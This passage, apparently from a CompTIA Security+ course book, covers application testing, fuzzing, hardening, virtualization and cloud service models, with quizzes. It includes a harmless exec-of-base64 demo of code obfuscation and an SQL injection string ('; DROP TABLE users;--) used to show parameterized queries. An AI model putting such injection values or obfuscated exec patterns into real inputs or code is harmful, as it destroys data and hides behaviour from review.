something that doesn't match the invalid special characters for each field, such as "@!*".
instructions.

c) Click Submit.
A JavaScript error message appears, showing that the web page itself recognized the bad data. You could use this to block form input, but since attackers can bypass JavaScript it would only protect against user errors.


d) Click OK. To close the error window. The page also reports that server
side validation detected all seven errors. If your error handling
code is up to snuff the bad data won't reach the database.

Application testing
A robust testing process is important to make sure that applications are not only functional but secure.
Important steps include:

Exam Objective: CompTIA SY0-501 3.6.6

Static analysis Examination of source code for potential problems, security or otherwise. This can
include manual code review by programmers, automated static code analyzers, or ideally
a combination of both.
Dynamic analysis Runtime analysis of a program that has been compiled and executed. It can include
examination of overall system performance from within the operating system, testing
input, and analyzing output. Some dynamic analysis uses human testers, and some uses
automated tools.
Stress testing Testing of an application or system's functions under strenuous conditions likely to
create problems. Stress testing often deliberately exceeds intended load capacities, or
induces errors to test error handling systems.
Model verification For mission-critical applications, the sort where failure might cause catastrophic damage,
even a stress test and traditional verification of software meeting design requirements
might not be enough. Model checking is an exhaustive test of every possible state of the
application to find all possibilities for critical errors. Model checking can be difficult and
expensive, and the more possible states the program can have the more complex
checking becomes.

In general, you don't want to test programs on production systems, or really anywhere they could compromise
production systems. Depending on the stage of the project you're testing in, a better practice is a test or
staging environment with appropriate sandboxing protections.

Code quality
When developing a secure application you don't only need to make sure you used secure principles in its
development. You also need to make sure there aren't unpleasant mistakes hiding in its implementation,
whether they're because of programmer error or malicious modification.

Exam Objective: CompTIA SY0-501 3.6.3, 3.6.5.7, 3.6.5.8, 3.6.5.11


One of the biggest risks in secure applications is including code written by someone else without knowing
exactly what is in it. Using third-party code libraries or software development kits (SDKs) is one of the best ways to
save time when developing a program. After all, why write and debug a new code module when a finished
product is already available? If you're careful this is not a problem, but many third-party libraries have serious
unpatched vulnerabilities, especially if you don't use the most recent version. Some may not even be publicly
disclosed. The more secure your product must be, the more carefully you must review any third-party content
you include.
Even reusing code you've written before can be a problem. It's not bad in itself, since if you have previously
written a function or library that almost matches what you need, you can save a lot of labor and opportunity
for new errors by reusing it. The problem is that if you're careless, you can introduce new vulnerabilities. For
example, copying over more code than is actually needed results in dead code that exists within the
application but isn't called on for any normal functions. If you're lucky, dead code only makes the program
larger, but it can lead to security issues too. Injection attacks and other exploits can force dead code to be
executed, and even if that never happens the larger program size makes it harder to perform code review and
find vulnerabilities.
It's also easy for vulnerabilities to sneak into applications due to problems in the change management process,
especially when using iterative development models or when there's poor communication between different
developers. Changes might be applied without adequate review, or bug fixes might accidentally be
overwritten by an older version. As development progresses, needlessly duplicated code or dead code might
accumulate. A formal change management process including version control software and regular code review
is essential for coordinating development.
Code review isn't easy, not only because of potential bugs, but because inside attackers commonly use
obfuscation to make malicious or exploitable code look harmless to a reviewer. It's especially easy if the code
wasn't clearly formatted to start, but even well-structured code can be rearranged to hide a vulnerability. More
ambitious obfuscation techniques involve self-generating code that behaves in unexpected ways at runtime, or
heavy compression that makes reverse engineering of binaries difficult.

Note: Obfuscating code can be useful for making programs more secure, by making it difficult for
attackers to analyze or reverse engineer your work. This can be effective, but makes code review more
difficult even if you know exactly what obfuscations were made.
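To see why obfuscation complicates review, compare the two hypothetical Python lines below: both print the same message, but the second hides its behavior behind an encoded string a reviewer would have to decode by hand.

import base64

# Clear version: a reviewer immediately sees what this line does.
print("routine cleanup")

# Obfuscated version: the same call hidden behind an encoding step. A reviewer
# skimming the file only sees exec() of an opaque string; in a real attack the
# decoded payload could be far less innocent than a print statement.
exec(base64.b64decode("cHJpbnQoInJvdXRpbmUgY2xlYW51cCIp").decode())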

Fuzzing
Input validation for any application is easy to begin but difficult to master, and in any case it needs to be
tested. One of the best ways is fuzz testing, or fuzzing—using an automated program to send random inputs to
the application, then seeing what happens. If the application isn't properly secured, fuzzing can cause it to
crash, produce other unexpected behavior, or even generate interesting error messages that reveal too much
about your security configuration. If you don't perform sufficient fuzzing, and correct the problems it reveals,
attackers will use their own fuzzing tools against your application sooner or later.
There are multiple types of fuzzing, depending on the type of application being tested.

Application fuzzing Tests I/O functions for the application. On a web application, this would mean URLs,
forms, Remote Procedure Calls (RPCs), and user-generated content.
Protocol fuzzing Sends forged, modified, replayed, or otherwise non-standard packets to a network
application.
File format fuzzing Creates and saves randomly formatted file samples to be opened and parsed by an
application.

Fuzzing has a lot of advantages. It's simple to do, and since it doesn't require any assumptions about how the
application works, it's suitable as a black-box testing technique. It can also catch a lot of problems human
testers tend to miss. That said, it's not a replacement for human testing either, since it tends to find only fairly
simple errors.
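As a minimal sketch of application fuzzing, the Python fragment below throws random printable strings at a hypothetical parse_order() input handler and records every unhandled exception; the handler and its field format are invented for the example, and real fuzzers are far more sophisticated.

import random
import string

def parse_order(raw):
    """Hypothetical input handler standing in for the code under test."""
    fields = raw.split(",")
    return {"item": fields[0], "qty": int(fields[1])}

def fuzz(iterations=1000):
    alphabet = string.printable
    crashes = []
    for _ in range(iterations):
        # Build an input of random length and content, including control characters.
        data = "".join(random.choice(alphabet) for _ in range(random.randint(0, 40)))
        try:
            parse_order(data)
        except Exception as exc:
            # A robust handler would reject bad input gracefully instead of raising;
            # every crash recorded here is a validation bug to investigate.
            crashes.append((data, repr(exc)))
    print(f"{len(crashes)} of {iterations} random inputs caused unhandled errors")

if __name__ == "__main__":
    fuzz()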

Provisioning
Once a web application or other network service has been tested thoroughly, actually deploying it is called
provisioning. Provisioning isn't just a matter of installing software. It describes the whole process of getting
your application and everything else needed to support it assembled and accessible to users. It can include
several aspects.

Exam Objective: CompTIA SY0-501 3.6.4

 Network provisioning is making sure that network resources are available to support the services being
offered, and that they are accessible to users.
 Server provisioning is setting up a server to host an application or service: configuring an operating
system, security controls, and the application itself along with all supporting software.
 User provisioning is the creation and maintenance of user accounts and attributes, such as permissions
and available services. It may be specific to an application, or part of a central identity management
scheme within the organization.
 Deprovisioning is the orderly freeing up of resources that have been provisioned. It can refer to the
removal of unused services and the readying of systems and networks for other purposes, but in the
security sense it most importantly means removing access whenever a user's permissions are revoked.

Automated provisioning software is available to help with application deployment. In particular, user
provisioning software is a popular way to manage users for network applications and services.
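The life cycle that user provisioning tools automate can be sketched in a few lines of Python. This is only an illustration of the provision/deprovision pattern, not any particular product's API; the in-memory account store stands in for a real identity system.

# Hypothetical in-memory account store standing in for a real identity system.
accounts = {}

def provision_user(username, roles):
    """Create the account and grant only the permissions its roles require."""
    accounts[username] = {"roles": set(roles), "enabled": True}
    print(f"Provisioned {username} with roles {sorted(roles)}")

def deprovision_user(username):
    """Disable access immediately; cleanup of leftover data can follow later."""
    if username in accounts:
        accounts[username]["enabled"] = False
        accounts[username]["roles"].clear()
        print(f"Deprovisioned {username}: access revoked")

provision_user("jsmith", ["sales_app", "email"])
deprovision_user("jsmith")   # e.g., triggered automatically when HR records a departure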

Hardening applications
In principle, hardening a web application isn't much different from hardening hosts and user applications. It
has most of the same steps, after all. The difference is that the stakes are typically higher, you're more likely
to face intelligent human attackers over the network, and code vulnerabilities are more likely to be your fault.
Even that isn't a big change: with any sort of hardening process, how careful and paranoid you need to be
depends on the level of risk.
Before you harden an application you need to determine a security baseline policy detailing the requirements
and principles needed to keep risks acceptable, which you can check against during later security audits or
configuration updates.

1. Harden the underlying host and network.


• Ensure the host is kept updated.
• Disable unnecessary applications, services, and user accounts.
• Apply antivirus and HIDS/HIPS software on the host.
• Protect the network with firewalls, NIDS/NIPS, or even specific web application firewalls.
• If the application uses multiple servers, for example one for the web server and one for the database,
make sure all of them are suitably hardened.
2. Securely configure the application.
• Choose securely coded applications using secure protocols.
• Make sure that application components and users operate in a least privilege environment.
• Apply secure client-side validation features.
• Apply special protections against likely attack vectors.
3. Thoroughly test the application before deploying it.
• Use a combination of human testing and fuzzing techniques for best results.
• For critical applications, consider outside security audits or penetration tests.
4. Maintain the deployed application's security over time.
• Conduct regular security audits.
• Use a rigorous patch management process to update host and application software without introducing
new vulnerabilities.
• Educate users to prevent attacks relying on social engineering.
• Be aware of constantly evolving network application threats.
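One way to make that baseline policy and the later audits concrete is to record the baseline as data and compare the live configuration against it. The Python sketch below does exactly that; the setting names and values are invented for the example.

# Hardening baseline expressed as required settings (names are illustrative).
baseline = {
    "telnet_enabled": False,
    "tls_min_version": "1.2",
    "antivirus_installed": True,
    "guest_account_enabled": False,
}

# Configuration as reported by the server being audited.
current = {
    "telnet_enabled": False,
    "tls_min_version": "1.0",
    "antivirus_installed": True,
    "guest_account_enabled": True,
}

def audit(baseline, current):
    """Return the settings that drift from the security baseline."""
    return [
        (key, expected, current.get(key))
        for key, expected in baseline.items()
        if current.get(key) != expected
    ]

for key, expected, actual in audit(baseline, current):
    print(f"Baseline violation: {key} is {actual!r}, expected {expected!r}")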


Discussion: Securing applications


1. Perform a web search for "SQL injection" and find a news article about a real-world data breach. What
does it say about the attacked site?
Answers may vary, but it probably held a lot of valuable data and had very few security controls.
2. Why should you use client-side validation as well as server-side?
Even though server-side validation is more secure, client-side works more quickly.
3. How can you protect against SQL injection attacks in fields where all SQL command characters would be
valid?
Sanitize the input by adding escape characters. That way the original content is preserved, but the database
won't mistake the field for part of a query. Parameterized queries, sketched after these questions, are an even
more reliable way to keep data separate from the SQL itself.
4. What's the most central rule for protecting against XSS attacks?
Never insert untrusted data except in allowed locations.
5. For a typical web application, what's the difference between application fuzzing and protocol fuzzing?
Application fuzzing looks for how the application interface responds to random or unexpected input,
while protocol fuzzing looks for how it responds to random or malformed network data.
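Here is the parameterized query approach mentioned in question 3, as an illustrative Python/sqlite3 fragment: the driver passes the field value as data, so quotes and semicolons are stored literally instead of being interpreted as SQL.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, comment TEXT)")

# Attacker-style input full of SQL metacharacters.
name = "O'Brien'; DROP TABLE users;--"

# The ? placeholders keep the value out of the SQL text entirely.
conn.execute("INSERT INTO users (name, comment) VALUES (?, ?)", (name, "hello"))
print(conn.execute("SELECT name FROM users").fetchall())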


Assessment: Securing applications


1. What technique tests an application's responses to random input? Choose the best response.
 Escaping
 Fuzzing
 Sanitization
 Validation

2. What kind of attack do synchronizer tokens help prevent?


 Buffer overflow
 SQL injection
 XSS
 XSRF

3. What does the software assurance process do? Choose the best response.
 Ensure applications are up to date.
 Ensure applications are regularly audited.
 Ensure applications are securely configured.
 Ensure applications are securely designed.

4. You're reviewing a web application. Which of these features are security warning signs? Choose all that
apply.
 Input errors are logged and clearly displayed to users in full detail.
 The web server and database software are on separate physical servers, both similarly secured.
 Input validation is performed more rigorously on the client side than the server side.
 The HTTPOnly flag is set on session cookies.
 Secret cookies are used to prevent XSRF attacks.

5. Even just blocking or sanitizing the < and > characters used by HTML tags can prevent many attacks.
True or false?
 True
 False

6. What DevOps practice keeps code created by multiple developers from diverging or conflicting? Choose
the best response.
 Baselining
 Continuous integration
 Immutable systems
 Infrastructure as code


Module B: Virtual and cloud systems


One of the biggest changes in modern computing is virtualization. Devices, hosts, and even entire networks
increasingly exist only as software which can transparently share, span across, or move between physical
hosts. Closely related is the concept of cloud computing, where previously static and local services are
dynamically allocated from remote data centers. Both can boost efficiency and reduce infrastructure costs for
many organizations, but they also bring new challenges and demands to the network and its security.
You will learn:
 About virtual networks
 About cloud services

About virtualization
"Virtual" is one of those words you hear applied to everywhere today, and it's easy to think if it as a
meaningless buzzword. Sure, sometimes it is, but it's also a number of very real and rapidly advancing
technological developments. Most aren't even really new technologies; it's more that we're currently at a
tipping point where increasingly powerful hardware combined with changing user needs are making
virtualization the solution to more and more problems.
There are a lot of virtualization technologies applied in different technology fields, but the underlying
concept is the same: changing the way users or software see and use a hardware platform by applying
abstraction layers between the two. That way, resources can be combined, distributed, or rearranged without
having to change the underlying physical layout of the system. The concept is pretty familiar in computing,
and networking in particular: it's much like the divide between the physical network and the logical network.
Modern networks use a lot of virtualization technologies, often but not always with "virtual" helpfully in the
name. VLANs allow you to separate the logical topology of an L2 network from its physical topology, VPNs
allow you to simulate private circuits over the internet, and SANs allow you to allocate network-based disk
arrays as though they were local storage. All of them have the same basic goal: achieving desired functions in
a way that's cheaper and more flexible than a traditional hardware-based solution. They're all important, but
another transformative technology is platform virtualization, in which host operating systems themselves are
separated from their underlying hardware.

Virtual machines
For decades, computing hardware has grown rapidly cheaper and more powerful, which is good since we
keep finding more uses for all that extra processing power. But the two don't always keep pace with each
other: while there's always a demand for new network services, the use of any particular network service
doesn't grow as fast as hardware speeds. This often means a new server you buy will have many times
the capacity of the one it's replacing, in fact enough to take over the workload of multiple existing servers.
One popular approach is just to combine all those services into the same hardware; sometimes it's a good idea,
like replacing a firewall, router, and NAT with a single device. On the other hand, if the services themselves
aren't closely related it could be technically difficult, or at the least be inflexible for future growth or
maintenance. Another possibility is installing multiple independent virtual servers on the physical server.

Exam Objective: CompTIA SY0-501 3.7.1


You obviously can't just install multiple operating systems on one computer and run them all at once: most of
the point of an operating system is that it controls system resources and allocates them to software
applications. Instead, a virtualized server needs another abstraction layer.


Host The physical hardware that ultimately hosts all the VMs. Not to be confused
with the usual network definition of "host."
Virtual Machine (VM) A virtual computer installed onto the host. To a user or application, or even the
VM itself, it's a normal operating system running on a normal hardware platform,
with its own CPU, memory, storage, and whatever other hardware devices it
needs. The VM's operating system is often called a guest OS.
Hypervisor A software abstraction layer that runs VMs as applications, effectively an
operating system for operating systems. To the VM the hypervisor looks like
underlying hardware, but it's actually just allocating host resources and allowing
multiple VMs to simultaneously share them. Hypervisors themselves can be
broken into two categories.
 Type I (or bare metal) hypervisors install directly on the host hardware and
have full control of it.
 Type II (or hosted) hypervisors install as applications in a normal host
operating system. They're less efficient than the bare metal type, but more
convenient for low-demand applications or test environments.

Virtual servers have a lot of benefits outside of just consolidating more services onto less hardware.
 VMs using different operating systems can share a host without conflicts.
 Maintenance on one VM, like system updates, doesn't need to affect other VMs on the same host.
 VMs are easier to back up, restore, or move to different hardware than traditional operating system
installations.
 It's relatively easy to change or upgrade hardware on hosts without affecting VMs, or to change the
memory or storage allocated to different VMs without hardware changes.

A newer alternative to traditional hypervisor-based system virtualization is container virtualization. Instead of
a bare metal or hosted hypervisor, the computer runs a normal operating system whose kernel can operate as a
sort of hypervisor in itself. The kernel then runs multiple containers. A container is like a VM in that it is
isolated from other containers on the same computer and can even perform relatively low-level operating
system tasks like defining its own file system, but it doesn't have a guest operating system; instead, it shares
the kernel of the host operating system. This reduces flexibility somewhat compared to a hypervisor, but it
increases performance and efficiency.


Virtualization isn't even just for servers; it's useful for desktop workstations as well. A workstation can run
VMs for legacy applications or software testing environments. Alternatively, virtual desktop environments
(VDEs) holding user data and applications can be hosted in a server room and accessed from anywhere on the
network, even from thin clients with limited computing power of their own. If the network's fast enough a
VDE can be as responsive as a normal one from the user's perspective, but the whole virtual desktop
infrastructure (VDI) is actually stored where IT staff can easily support and maintain it.

Virtual applications
The other common form of virtual machine is the kind used for application virtualization. In this method, the
VM is an application that emulates a specific software environment, which itself can be run in theory on any
operating system, and maybe even any hardware whatsoever. This makes things easier for developers since
they don't have to write programs to a single physical architecture, and for users because they can use the
same programs on multiple platforms. A few examples of application virtualization include:
 Java (not to be confused with JavaScript) is a virtual platform popular with web, desktop, and mobile
apps. You need to install a version of the Java VM application compatible with your operating system,
but then in theory you can run any Java application with little or no modification.
 More broadly, many web apps are virtual applications which run partly or completely by using modern
web browsers as a VM on the client side. The server side may be a traditional application on a
physical server, or may be within a VM or container. On the client, any standards-compliant web
browser can run the client-side scripts needed.
 Wine is an application that allows you to run many Windows applications on non-Windows operating
systems. While the underlying hardware still must be x86-based, Wine serves as a virtual environment
that makes the application think it's on a Windows computer, and translates between the application and
the host operating system.

Virtual applications have some limitations compared to virtual systems, such as being poorly suited to tasks
that need low-level access to underlying hardware or operating system functions. For example, it's particularly
difficult to make an antivirus program or disk scanning utility as a virtual application.


Virtual network devices


A hypervisor has to make sure its VMs share the host's resources without directly interfering with each other.
It allocates CPU time to each while making sure none can dominate it entirely, splits up the host's RAM
space, allocates virtual drives or partitions on the physical hard drive, and so on. Networking can make it
complicated: what happens if all of those VMs need to communicate with each other, or with outside hosts?
Unless the host has a separate physical NIC for each VM, which isn't typical, the hypervisor also needs to
provide network services for its VMs.
To join a network, a VM needs a NIC. Instead of a physical one, it has a virtual NIC (VNIC), existing in
software form. The virtual NIC still has a MAC address, an IP address, and all the other settings and functions of a
real card, except that instead of sending and receiving physical signals, all of its network traffic passes through
the hypervisor. Multiple VNICs can correspond to one physical NIC. At its most basic, the VNIC on a VM
can be configured a few ways.
 On an isolated internal network: the VNIC is assigned an internal IP address, and can communicate
only with the hypervisor and/or other VMs on the same host.
 On an internal subnet: the VNIC is assigned an internal IP address, but the hypervisor performs NAT so
the VM can connect to the outside network.
 As a bridged adapter: the VNIC is assigned an external IP address and joined directly to the outside
network. To outside observers, the VM and host will appear to be different network addresses even
though they share a physical NIC.

If you think about it, that means that at the minimum the hypervisor also has to behave as a virtual switch, and
potentially as a router or NAT. It can also provide firewall functions for security purposes. Or you could go a
step further: since routers and firewalls are essentially network hosts themselves you could install one as a
VM. Many firewall and router vendors today even offer virtual versions of their products.
You don't even have to put all the VMs on the same subnet or broadcast domain in the outside network just
because they share a physical NIC. You can install a virtual switch with VLAN functions, and then configure
the physical NIC as a trunk line from the virtual switch to the physical switch outside—that is, presuming it's
a physical switch: these days you might need to check it out to be sure.


Software-defined networking
Even with VLANs, virtualization, and steadily improving routing and switching protocols, networks keep
getting more complex and harder to manage. Devices need a lot of individual manual configuration, even
when it can be done remotely, and it's hard to keep coordinated, especially when the network mixes devices
from different vendors. It's easy for a physical or logical change in the network structure to have a cascading
effect that hurts performance throughout the system, too. As a result, it's easy for administrators of large
networks to become conservative about any changes even when network needs and usage patterns shift, just
trying to find a static configuration that works, and holding onto it to prevent service disruptions.

Exam Objective: CompTIA SY0-501 3.2.5


An emerging solution to this is known as software-defined networking (SDN), and much like virtualization
technologies it works by adding a new abstraction layer to divide physical and logical functions. Specifically,
it separates the functions of routers, switches, and related devices into two planes.
 The control plane makes decisions about the overall flow of traffic. It encompasses the duties of
routing protocols, switching protocols, QoS settings, and other settings that store or communicate rules
through the network.
 The data plane does the work of moving individual frames and packets through the network. It routes
packets, schedules queues, reads routing tables and ARP values, and so on. It doesn't have to do the
thinking, so to speak, because it's only following orders received from the control plane.

SDN allows administrators to centrally manage the entire network through a network controller that separates
the two planes. The network controller can communicate with upper level SDN applications to govern control
plane functions, and with lower level SDN datapaths to adjust device settings in the data plane.
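The split between the two planes can be illustrated with a purely conceptual Python sketch (this is not any real SDN controller's API): the controller makes the forwarding decisions, and each datapath simply applies whatever rules it has been given.

class Datapath:
    """Data plane: forwards traffic using rules pushed down by the controller."""
    def __init__(self, name):
        self.name = name
        self.flow_table = {}          # destination -> output port

    def install_rule(self, destination, port):
        self.flow_table[destination] = port

    def forward(self, destination):
        port = self.flow_table.get(destination, "drop")
        print(f"{self.name}: packet for {destination} -> {port}")

class Controller:
    """Control plane: decides the overall flow of traffic for all devices."""
    def __init__(self, datapaths):
        self.datapaths = datapaths

    def apply_policy(self, destination, port):
        # A centralized decision, pushed to every switch in one step.
        for dp in self.datapaths:
            dp.install_rule(destination, port)

switches = [Datapath("sw1"), Datapath("sw2")]
controller = Controller(switches)
controller.apply_policy("10.0.0.5", "port2")
switches[0].forward("10.0.0.5")
switches[1].forward("10.0.0.99")   # no rule installed, so the packet is dropped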

Note: Like traditional remotely managed network components, SDN controllers use a variety of network
control protocols, and these can be attacked. SDN infrastructure should use secure protocols such as
SNMP v3 and SSH, and individual controllers and devices must be hardened against intrusion.
Alternatively, OOB control can improve security if the network's physical structure makes it convenient.
At present, SDN has mostly found a foothold in complex networks run by large companies and busy data
centers, while most organizations haven't really implemented it yet. As with any network technology, only
time will tell just how far it will spread through the industry.

Security benefits of virtualization


Virtual platforms have a number of benefits and applications that help maintain security, especially
availability.

Snapshots It's easy to create a snapshot of a VM—a read-only copy of its disk file and
configuration information, much like a system image or restore point on a physical
host. By creating snapshots before risky activities like updates or installations, you
can easily revert to them if anything goes wrong.
Sandboxing Since a VM can only access host resources through the hypervisor, and doesn't
interact directly with other VMs, it's effectively a sandbox environment isolated from
the rest of the host. While it's not perfect, this means a VM compromised by malware
or another attack is less likely to compromise the host or other VMs. For this reason,
VMs are often used to run untrusted code before allowing it on production systems.
Security control testing Virtual test environments are an ideal place to thoroughly test security controls
before deploying them on the "real" network.
Patch compatibility A test VM is also useful for testing operating system or application patches to make
sure they don't introduce any problems.


Host availability/elasticity It's fairly easy to maintain high availability for services hosted on a VM—after all,
it's easy to transfer the VM if the physical host has problems or needs maintenance.
It's also easy to provide elasticity, or change the resources allocated to the VM based
on its load. If you're expecting a busy day for your web store because a sale just
started, you can give its VM a bigger share of the host, or copy it to add more
redundant systems if you're using load balancing.

Securing virtual systems


For all the security benefits they have, VMs aren't without risk. Most risks to VMs are the same risks physical
hosts face: they can become infected with malware, be targeted by network attacks, have application crashes,
and so on. Naturally, they're also harmed by anything happening to their host.

Exam Objective: CompTIA SY0-501 3.7.2, 3.7.3


A few risks are particular to VMs. Some malware today is designed with virtual systems in mind, and can
perform a VM escape: a virus might attack the hypervisor from inside the VM, or more commonly hop from
one VM to another. This is especially a risk in container virtualization, since all containers directly share the
same OS kernel. Some malware is even able to detect when it's running in a VM and stay dormant—that way,
you won't notice its effects while testing untrusted code in a VM, only after you install it on a physical host.
Another risk is far more prosaic: people tend to treat VMs as distinct from "real" computers. They're
overlooked when it comes to security, updates, or secure data storage and disposal. This leads to a condition
known as VM sprawl. The most important thing in keeping a secure environment with VMs is to make sure
those disk images are tracked and secured just as well as expensive, visible physical hardware.

 Clearly establish who is responsible for configuring and securing each VM, whether it's in the server
room or a desktop test environment. It's easy for VM sprawl to lead to orphaned VMs everyone thinks
"belongs" to someone else, or for employees to maintain unauthorized and poorly secured VMs that
compromise overall security without administrator knowledge.
 Make sure that all VMs are hardened just like physical hosts would be, with antivirus software and
regularly installed updates.
 When you install multiple VMs hosting important functions on a single host, understand that the
physical host has become a single point of failure for all of them. Secure and maintain it accordingly.
 Ensure that VMs are only used in appropriate security environments.
• VMs should only be connected to network segments matching their security needs.
• VMs with very different security standards or running workloads with different trust levels shouldn't
be run on the same physical host.
• Virtual disk images holding sensitive data need to be secured just as the data itself would be, whether
they're running or not.
• Some hypervisors on compatible hardware allow memory encryption that protects compromised VMs
from affecting others on the same host.
 Virtual network devices and appliances are one of the primary vectors for VM hopping attacks, so they
need to be configured just as securely as physical ones. This is easy to overlook, since they're often seen
as easy preconfigured building blocks.
 Ensure that all VMs running important workloads have enough host resources to maintain service
availability.
 Closely examine regulatory requirements for PII or other sensitive information to see what might restrict
your use of virtualization.


Non-persistent VDI
Traditional system virtualization uses what are called persistent images. You might start a new VM with a copy
of an existing system image, but once you do, that image remains in place as long as you use it. Just as if you'd
installed the system image onto a physical computer, any changes you make persist. If you have multiple
VMs, that also means you need to apply updates or other configuration changes to all of them individually,
just as if they were physical computers. While you can use documentation and network-based tools to
minimize VM sprawl, it can still be a lot of work to manage a large number of virtual workstations in a
persistent VDI deployment. It can also take a lot of storage space to keep so many active disk images and their
backups.

Exam Objective: CompTIA SY0-501 3.3.8.3, 8.4.1, 3.8.4.2


One alternative to reduce that work is non-persistent VDI. In that architecture, the central server only stores
one master image (or golden image) of a fully configured computer. Whenever a user logs in, the server starts
a VM that is based on the master image, but which doesn't directly change any of its files or settings. All
changes are applied to a temporary copy or file system instead, and when the user logs out all of the
temporary data is deleted. When the user logs in again, or even when different users log in at the same time,
they each receive a new, generic VM.
Non-persistent desktops don't just save storage space: they also make it easy to apply updates or configuration
changes, and prevent users from making configuration changes that will cause long-term security risks. They
tend to work well for classes of users that only need standard workstations without user customization, such
as call center workers, but not very well for users who have unique configuration or software needs. User
profiles and documents, if they're needed, must be stored separately.
Non-persistent VDI is a rapidly evolving technology. One new development is application layering, where a
given user can have a customized VM that includes all the applications associated with their user profile,
without the server needing a separate master image for each unique combination of installed applications.
Other applications of non-persistence
VDI is one of the main examples of non-persistence used for security and efficiency, but as a general principle
it's useful in a lot of computing areas. Whether you're using virtualization or not, non-persistence allows you
to make sure you're not preserving unwanted data, configuration changes, or malware, and always beginning
with a clean slate.

Exam Objective: CompTIA SY0-501 3.8.4.3, 3.8.4.4

 A Live CD is a complete bootable operating system placed on a CD, DVD, or other read-only bootable
media. Since the live boot media can't be directly modified it's safe from malware and configuration
changes. It also can be used without affecting any operating systems installed on the computer's
internal storage. Live CDs are commonly used as repair media for malware-infected or otherwise non-
bootable computers, but they can be used for any other purpose their installed software allows.
 The private browsing features used by modern web browsers are a form of non-persistence. While they
won't protect you from malware or other network attacks, they prevent malicious or sensitive data from
being stored permanently in your browser cache. When you close private mode, all data regarding your
browsing session is purged.
 Many applications and operating systems allow you to take configuration snapshots, or even do so
automatically when you make configuration changes. By making a snapshot of a security baseline you
can revert to that known state or configuration when you suspect any problems.

Note: Reverting to a known state might not work in some cases, such as using Windows
System Restore to undo harm caused by a malware infection, so it's not as complete as a true
non-persistence solution.


Discussion: Virtual hosts


1. What server roles have you seen that could benefit from being placed on a VM in one physical server?
Answers may vary, but could include DHCP servers, authentication servers, or many others. It's less
about specific server roles and more about low-demand servers maintained as separate VMs on the same
hardware.
2. What kind of hypervisor does this course's virtual lab environment use?
Unless the setup has been changed, it's a hosted (Type II) hypervisor.
3. How could virtualization help you maintain host security?
Answers may vary, but it allows sandboxed test environments, high availability systems, and easy
configuration backups.
4. What's the most common security risk of virtual hosts?
Answers may vary, but the most important is that instead of being treated like "real" computers they're
overlooked when it comes to security, updates, or secure data storage and disposal.
5. What forms of non-persistence have you used?
Answers may vary, but private browsing is one of the most common.

Cloud services
Another of those terms you hear everywhere today is "the cloud," generally describing some sort of online
service. While cloud metaphors and illustrations have been used to describe the uncertain topology of WANs
for ages, cloud computing actually means a more specific style of service model for online services that's been
rapidly growing in recent years, and the technologies that support it. In the simplest explanation, cloud
services allow individuals and businesses to share resources in third-party data centers. As a vague concept
it isn't very new: time-sharing on mainframes was sold before the Internet even existed, and network
hosting services have been around a long time, but virtualization and high-speed Internet connections have
given the idea new levels of power and flexibility. In practice, a cloud service has some significant differences
from a traditional hosted service you might purchase in a third-party data center, and even more from on-
premises services you would place in your own server room.

Exam Objective: CompTIA SY0-501 3.7.6


Since cloud computing is more a service model than a specific technology, it's easiest to define it in terms of
the service features it offers. In 2011, the National Institute of Standards and Technology (NIST) made the
closest thing to a universally accepted definition.
“"Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared
pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can
be rapidly provisioned and released with minimal management effort or service provider interaction."”
Further, the NIST defines five elements which a cloud computing service must have.

On-demand self-service Customers must be able to access computing resources unilaterally and
automatically, without human interaction with the service provider.
Broad network access Resources are available through the network in a standard format that allows and
in fact promotes use from a wide variety of client platforms, often including any
sort of computer or mobile device.
Resource pooling The provider's resources are pooled and shared between multiple customers in a
multi-tenant fashion, and can be dynamically allocated to suit changing demands.
As much as possible, the customer doesn't even need to know where the resources
are hosted: they just work wherever you are.


Rapid elasticity Resources can be quickly, even automatically, allocated or released to meet
demand. From a customer perspective, resources might seem to be unlimited.
Measured service Resources are in some way measured and metered, so that usage can be monitored
and transparently reported, and so that the customer can be billed appropriately.
The exact means of measurement can depend on the type of service: processing
time, storage space, active users, or bandwidth usage.

It's worth noticing that none of these definitions actually specifies virtualization. That's not an oversight; as
much as cloud services are seen as a virtualization technology, it's not because they have to be by definition.
It's only that virtualization is an incredibly useful technology for providing the dynamic flexibility cloud
providers need to offer. In fact, one of the defining points of virtualization is that it aims to make itself as
transparent as possible to the end user.

Cloud models
The NIST definitions also included three service models for cloud computing, each describing a category of
provider offering.

Exam Objective: CompTIA SY0-501 3.7.4, 3.7.5

Software-as-a-service Subscription-based access to applications or databases, sometimes known as
"on-demand software." This shouldn't be confused with locally installed
software that has a subscription-based license: SaaS is centrally installed in the
provider's data center, and users can access it using a client application or web
browser. It's popular with enterprise software vendors of all types, and SaaS
applications can be almost anything: popular categories include office,
accounting, CRM, management tools, and even antivirus software. To the
customer, SaaS might have user accounts and settings, but it isn't a set of
locally installed, visible files like normal software, and the provider handles
maintenance and support. Pricing is usually either a subscription fee or pay-by-
use. In technical terms, SaaS applications are usually built either as web
applications designed to run in the browser with a combination of server-side
and client-side code, or as web services applications which use Simple Object
Access Protocol (SOAP) and eXtensible Markup Language (XML) over HTTP
to allow two devices, like a server and a mobile application, to communicate
and perform tasks.
Platform-as-a-service Access to a computing platform or software environment the customer can use
to develop and host web-based applications. PaaS can be used to develop
applications for the customer to offer as their own Internet service, or it can be
used for internal applications. Either way, the provider manages the underlying
hardware infrastructure and development tools, so the customer has to do only
the actual software development. On the technical level, PaaS uses the same
tools as SaaS, but instead of a complete application it supplies the underlying
servers, databases, and other pieces customers need to develop their own
applications.
Infrastructure-as-a-service Access to computing and network resources themselves, such as storage
devices, processing, entire computers, and even whole networks. The customer
can install and manage operating systems, file systems, and whatever else is
needed, just like if they'd rented out a piece of a data center, since that's
essentially exactly what it is. The resources offered are typically, but not
necessarily, VMs, but either way the provider manages and is responsible for
the underlying hardware.


Some sources have added other models to the list, such as Storage-as-a-service, Information-as-a-service,
Security-as-a-service, and so on. For the most part they're just refinements of the three categories: for
instance, popular cloud storage services are a little like IaaS, but are designed to seamlessly mirror local files
to back them up or to share them with other users and devices. For any cloud service, the relevant point is that
it's nothing customers couldn't just do themselves locally if they wanted to: the cloud provider just offers
flexibility and ease of operation.
Likewise, there are four deployment models, which describe just who can access a given cloud service.

Public The service is available to the general public, whether as a paid service or even for free. It can
be owned and hosted by any sort of public or private organization. Cloud services offered
directly to consumers are usually this type.
Private The service is accessible only to a single organization, though it is shared among multiple
divisions or business units. It might be on-premises or off, and it might be owned and
